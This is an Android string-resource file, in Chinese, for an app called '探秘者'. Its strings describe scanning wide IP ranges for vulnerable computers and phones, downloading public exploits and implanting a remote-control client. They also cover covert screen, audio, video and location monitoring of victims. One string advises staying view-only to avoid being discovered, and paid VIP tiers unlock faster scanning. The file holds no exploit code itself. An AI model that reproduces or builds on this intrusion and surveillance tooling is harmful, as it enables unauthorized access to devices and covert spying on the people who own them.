<resources>
    <string name="app_name">探秘者</string>
    <string name="app_lang">zh</string>
    <string name="ui_btn_login">登录</string>
    <string name="ui_btn_register">注册</string>
    <string name="ui_hint_username">请输入你的帐号</string>
    <string name="ui_hint_password">请输入你的密码</string>
    <string name="ui_check_rememberpass">记住登录密码</string>
    <string name="msg_username_empty">帐号不能为空，请重新输入</string>
    <string name="msg_password_empty">密码不能为空，请重新输入</string>
    <string name="ui_intrusion_title">扫描漏洞 远程植入受控端</string>
    <string name="ui_intrusion_title2">扫描是针对网络上大范围的IP地址发送数据包，请使用WiFi联网。启动扫描后可能持续几分钟到十几分钟，请耐心等待...</string>
    <string name="ui_text_target_region">目标地区：</string>
    <string name="ui_text_target_type">设备类型：</string>
    <string name="ui_checkbox_cn_first">优先针对中文系统的设备</string>
    <string name="ui_btn_start">开始扫描</string>
    <string name="ui_btn_stop">停止扫描</string>
	<string name="ui_select_type_all">电脑和手机</string>
	<string name="ui_select_type_pc">电脑</string>
	<string name="ui_select_type_mobile">手机</string>
	<string name="msg_cant_scan_local_lan">对不起，你暂时不能选择针对本地WiFi局域网，请先付费升级VIP会员！</string>
	<string name="msg_scan_no_device_with_hole">很遗憾，未能扫描到能利用漏洞的设备！！！</string>
	<string name="msg_hacker_info_not_available">系统漏洞数据，初始化失败！</string>
    <string name="msg_download_hacker_or_not_1">注意：现在你需要从互联网下载一些第三方已公开的漏洞利用程序，使用这些漏洞利用程序能够远程进入他人的计算机系统，这可能给你带来某些法律上的风险。我们建议你仅仅将此作为网络安全领域的学习研究用途，不要恶意破坏、篡改他人的计算机系统和数据，并在研究完成后立即删除已下载的漏洞利用程序。\r\n
\r\n
</string>
	<string name="msg_download_hacker_or_not_mid">] 的漏洞利用程序;\r\n
</string>
    <string name="msg_download_hacker_or_not_2">\r\n
要自动下载上述漏洞利用程序请点击“确定”，终止操作请点击“取消”。。。</string>
	<string name="msg_downloading_hacker">正在下载第三方漏洞利用程序。。。</string>
    <string name="msg_vip_multi_thread_scan">有VIP权限，正在启动多线程扫描模式。。。</string>
    <string name="msg_scanning_ip_format">正在扫描IP地址：*%1$d.*%2$d.%3$d.%4$d</string>
    <string name="msg_scanning_lan_ip_format">正在扫描局域网IP地址：%1$d.%2$d.*.%3$d</string>
    <string name="msg_trying_security_hole_1">正在尝试漏洞：</string>
    <string name="msg_use_hole_installing_skd">成功利用漏洞！！！正在植入受控端程序。。。</string>
    <string name="msg_communication_error_retry_later">网络通信错误。。。5秒后重试</string>
    <string name="msg_installing_skd">成功就在眼前，正在努力植入受控端程序。。。</string>
    <string name="msg_another_method_installing_skd">正在换一种方法，加倍努力植入受控端程序。。。</string>
    <string name="msg_huhuhu_install_skd_ok">虎！虎！虎！已经成功植入一个受控端程序！！！</string>
    <string name="msg_congratulations_install_skd_ok_1">恭喜你！已经成功植入受控端程序：\r\n
受控端 </string>
    <string name="msg_deleting_hacker">正在删除本设备上的所有漏洞利用程序。。。</string>
    <string name="msg_vip_can_scan_fast">提示：付费升级VIP后，可以启用多线程扫描模式，大大加快扫描速度！</string>
    <string name="keywords_duplicate_add">重复添加</string>
    <string name="ui_ok_btn">确定</string>
    <string name="ui_cancel_btn">取消</string>
    <string name="ui_yes_btn">是</string>
    <string name="ui_no_btn">否</string>
    <string name="msg_communication_error">网络通信错误，请检查网络设置后重试</string>
    <string name="msg_internet_error">无法访问英特网，请检查网络设置</string>
    <string name="msg_please_wait">请等待。。。</string>
    <string name="msg_nat_detect_failed">本地NAT防火墙探测失败，您的网络环境可能封锁了UDP通信</string>
    <string name="msg_nat_blocked">本地NAT防火墙无法穿透，您的网络环境可能封锁了UDP通信</string>
    <string name="msg_nat_detect_success">本地NAT探测成功</string>
    <string name="msg_connect_register_local">正在提交本机连接信息，请稍侯。。。</string>
    <string name="msg_connect_register_local_failed">提交本机连接信息失败，请重试</string>
    <string name="msg_connect_get_peer">正在获取受控端连接信息。。。</string>
    <string name="msg_connect_get_peer_failed">获取受控端连接信息失败，请刷新列表后重试</string>
    <string name="msg_connect_wait_queue_format">正在同受控端同步时间，%1$d秒。。。</string>
    <string name="msg_connect_nat_hole">正在打通P2P连接信道。。。</string>
    <string name="msg_connect_proxy_failed">无法建立连接，暂时性网络状况不好，请稍后重试</string>
    <string name="msg_connect_connecting">正在同受控端建立连接，请稍候。。。</string>
    <string name="msg_connect_reverse_connecting">正在等待受控端发起反向连接，请稍候。。。</string>
    <string name="msg_connect_connecting_failed1">连接失败(udpopen failed)</string>
    <string name="msg_connect_connecting_failed2">连接失败(udtopen failed)</string>
    <string name="msg_connect_connecting_failed3">连接失败(udt connect() failed)，请重试</string>
    <string name="msg_connect_connecting_failed4">连接失败(WaitForProxyReady failed)，请重试</string>
    <string name="msg_connect_connecting_failed5">连接失败(tcp socket() failed)</string>
    <string name="msg_connect_connecting_failed6">连接失败(tcp bind() failed)</string>
    <string name="msg_connect_connecting_failed7">连接失败(tcp connect() failed)，请重试</string>
    <string name="msg_connect_connecting_failed8">暂时性网络状况不好，直连有点小困难，请稍后重试或者采用TCP连接</string>
    <string name="msg_connect_checking_password">成功建立连接，正在验证密码。。。</string>
    <string name="msg_connect_checking_password_tcp">正在等待受控端响应TCP连接。。。</string>
    <string name="msg_connect_checking_password_failed1">验证密码时通信出错，无法连接</string>
    <string name="msg_connect_checking_password_failed2">密码错误，无法连接</string>
    <string name="msg_connect_checking_password_retry">密码错误，请重试</string>
    <string name="msg_connect_dlgpass_title">请输入受控端设置的连接密码</string>
    <string name="msg_lan_cant_tcp_connect">本地局域网中不能用TCP连接</string>
    <string name="msg_modify_comments_title">给该受控端备注名称</string>
	<string name="ui_text_username">会员帐号：</string>
	<string name="ui_text_change_nick">[修改昵称]</string>
	<string name="ui_text_change_pass">[修改密码]</string>
	<string name="ui_text_validate_time">VIP有效期：</string>
	<string name="ui_text_not_vip">尚未升级VIP</string>
	<string name="ui_text_userscore">会员积分：</string>
	<string name="ui_text_score_detail">[积分明细]</string>
	<string name="ui_text_score_cash">[积分提现]</string>
	<string name="ui_intrusion_btn">探索●扫描</string>
	<string name="ui_phonenum_btn">针对手机号</string>
	<string name="ui_addcam_btn">特定受控端</string>
	<string name="ui_refresh_btn">刷新列表</string>
	<string name="ui_exitapp_btn">退出软件</string>
	<string name="msg_mobcam_offline">[该受控端不在线或暂不可用]</string>
	<string name="msg_local_lan">本地局域网</string>
	<string name="msg_empty_addcam_first">列表为空，请先扫描或添加特定受控端</string>
	<string name="msg_not_support_location">该类型的受控端不支持定位功能</string>
	<string name="msg_cant_location">地理坐标不可用，暂时无法在地图中定位</string>
	<string name="msg_exit_app_or_not">是否确定要退出该应用软件？</string>
	<string name="msg_disconnect_vnc_or_not">是否确定要断开VNC连接？</string>
	<string name="msg_vnc_connecting">建立VNC连接</string>
	<string name="msg_protocol_handshake">正在进行握手协议。。。</string>
	<string name="msg_download_first_frame">正在准备第一帧显示数据。。。</string>
	<string name="msg_vnc_connection_aborted">连接已取消</string>
	<string name="center_mouse">鼠标居中</string>
	<string name="color_format_caption">显示颜色数</string>
	<string name="color_mode">显示质量</string>
	<string name="vnc_disconnect">断开VNC连接</string>
	<string name="fit_to_screen">适合本地显示屏</string>
	<string name="vnc_info">连接信息</string>
	<string name="input_mode">控制模式</string>
	<string name="input_mode_fit_to_screen">No Pan; Trackball Mouse</string>
	<string name="input_mode_mouse">鼠标模式</string>
	<string name="input_mode_panning">Desktop Panning Mode</string>
	<string name="input_mode_touchpad_pan_trackball_mouse">Touch Pan; Trackball Mouse</string>
	<string name="input_mode_dpad_pan_touchpad_mouse">Touch Mouse; D-Pad Pan</string>
	<string name="input_mode_touch_pan_zoom_mouse">屏幕缩放移动模式</string>
	<string name="input_mode_touchpad">触摸板模式</string>
	<string name="local_mouse_check">Local mouse pointer</string>
	<string name="mouse_follow_pan">Mouse follow pan</string>
	<string name="one_to_one">1:1 显示</string>
	<string name="pan_follow_mouse">Pan Follows Mouse</string>
	<string name="scaling">缩放模式</string>
	<string name="scaling_zoomable">可手动缩放</string>
	<string name="showkbd_label">软键盘</string>
	<string name="viewonly_or_not">是否只做查看</string>
	<string name="viewonly_yes">只做查看</string>
	<string name="viewonly_no">可以控制</string>
	<string name="viewonly_cant_change">当前你只能监视不能操作，否则容易被发现</string>
	<string name="item_send_key">发送特殊按键</string>
	<string name="sendkey_win_cad">向PC电脑发送Ctrl + Alt + Del</string>
	<string name="sendkey_android_power">向安卓发送电源键（Power）</string>
	<string name="sendkey_android_home">向安卓发送主页键（Home）</string>
	<string name="sendkey_android_back">向安卓发送返回键（Back）</string>
	<string name="sendkey_android_menu">向安卓发送菜单键（Menu）</string>
	<string name="sendkey_up">发送向上按键（旋转屏幕）</string>
	<string name="sendkey_down">发送向下按键（旋转屏幕）</string>
	<string name="sendkey_left">发送向左按键（旋转屏幕）</string>
	<string name="sendkey_right">发送向右按键（旋转屏幕）</string>
    <string-array name="array_select_operation_items">
        <item>连接-全功能</item>
        <item>TCP连接-全功能</item>
        <item>TCP连接-音视频监控</item>
        <item>TCP连接-屏幕监控</item>
        <item>在地图中定位</item>
        <item>备注名称</item>
        <item>从列表中移除</item>
    </string-array>
    <string-array name="array_select_operation_2_items">
        <item>连接-视频遥控</item>
        <item>TCP连接-视频遥控</item>
        <item>连接-使用DroidPlanner</item>
        <item>TCP连接-使用DroidPlanner</item>
        <item>在地图中定位</item>
        <item>设置音视频参数</item>
        <item>从列表中移除</item>
    </string-array>
    <string-array name="array_select_operation_offline_items">
    	<item>在地图中定位</item>
        <item>备注名称</item>
        <item>从列表中移除</item>
    </string-array>
    <string name="ui_btn_av">音视频监控</string>
    <string name="ui_btn_vnc">屏幕监控</string>
    <string name="ui_btn_ft">文件传输</string>
    <string name="ui_btn_lock">屏幕锁屏</string>
    <string name="ui_btn_unlock">屏幕解锁</string>
    <string name="ui_btn_shutdown">受控端关机</string>
    <string name="ui_btn_reboot">受控端重启</string>
    <string name="ui_btn_uninstall">卸载受控端软件</string>
    <string name="ui_text_name">受控端名：</string>
    <string name="ui_text_os_info">OS信息：</string>
    <string name="ui_text_pri_ip">内网IP：</string>
    <string name="ui_text_pub_ip">公网IP：</string>
    <string name="msg_shutdown_or_not">受控端关机后将无法远程控制，是否确定要让受控端关机？</string>
    <string name="msg_reboot_or_not">受控端重启时将断开连接，是否确定要让受控端重启？</string>
    <string name="msg_uninstall_or_not">注意，卸载受控端软件后将无法远程控制，要再控制必须重新安装受控端软件。是否确定要卸载受控端软件？</string>
	<string name="msg_disconnect_or_not">是否确定要断开同受控端的连接？</string>
	<string name="msg_server_not_support_this_function">提示: 受控端软件不支持这项功能，或者由于未付费升级ID而被屏蔽了这项功能！请咨询客服QQ1：478046502，QQ2：1795782702</string>
	<string name="msg_server_not_root_for_this_function">提示: 受控端手机需要Root后才能支持这项功能</string>
	<string name="msg_level_too_low_for_this_function">提示: 免费试用的不能使用这项功能，需要先升级VIP会员，请联系客服QQ1：478046502，QQ2：1795782702</string>
	<string name="msg_check_id_and_password">“探秘者”可以远程控制特定的PC电脑、安卓手机或平板电脑。你需要到受控端电脑或手机上手动安装 “网灵云控制”受控端软件，并得到两个信息：受控端ID和连接密码。</string>
	<string name="ui_text_mobcam_id">受控端ID：</string>
	<string name="ui_text_password">连接密码：</string>
	<string name="ui_help_btn">如何手动安装 “网灵云控制”受控端</string>
	<string name="ui_add_btn">添加</string>
	<string name="msg_mobcam_id_empty">受控端ID不能为空，请重新输入</string>
	<string name="msg_mobcam_id_invalid">受控端ID输入有误，必须是一个整数，请重新输入</string>
    <string name="ui_avparam_audio_enable">接收声音</string>
    <string name="ui_avparam_video_enable">接收视频</string>
    <string name="ui_avparam_text_videosize">视频分辨率（按实际网络带宽选择）：</string>
    <string name="ui_avparam_videosize_vga">640x480</string>
    <string name="ui_avparam_videosize_qvga">320x240</string>
    <string name="ui_avparam_videosize_480x320">480x320</string>
    <string name="ui_avparam_text_framerate">视频帧率（请按实际网络带宽选择）：</string>
    <string name="ui_avparam_framerate_a">5 fps</string>
    <string name="ui_avparam_framerate_b">10 fps</string>
    <string name="ui_avparam_framerate_c">15 fps</string>
    <string name="ui_avparam_check_audioredundance">启用音频数据冗余传输</string>
    <string name="ui_avparam_check_videoreliable">视频可靠传输（保证视频清晰无马赛克但可能有延迟）</string>
    <string name="ui_ft_upload_file">上传文件</string>
    <string name="ui_ft_new_folder">新建远程文件夹</string>
    <string name="ui_ft_search">远程文件搜索</string>
    <string name="ui_ft_exit">退出</string>
    <string name="ui_ft_open_local_file">打开/编辑本地文件</string>
</resources>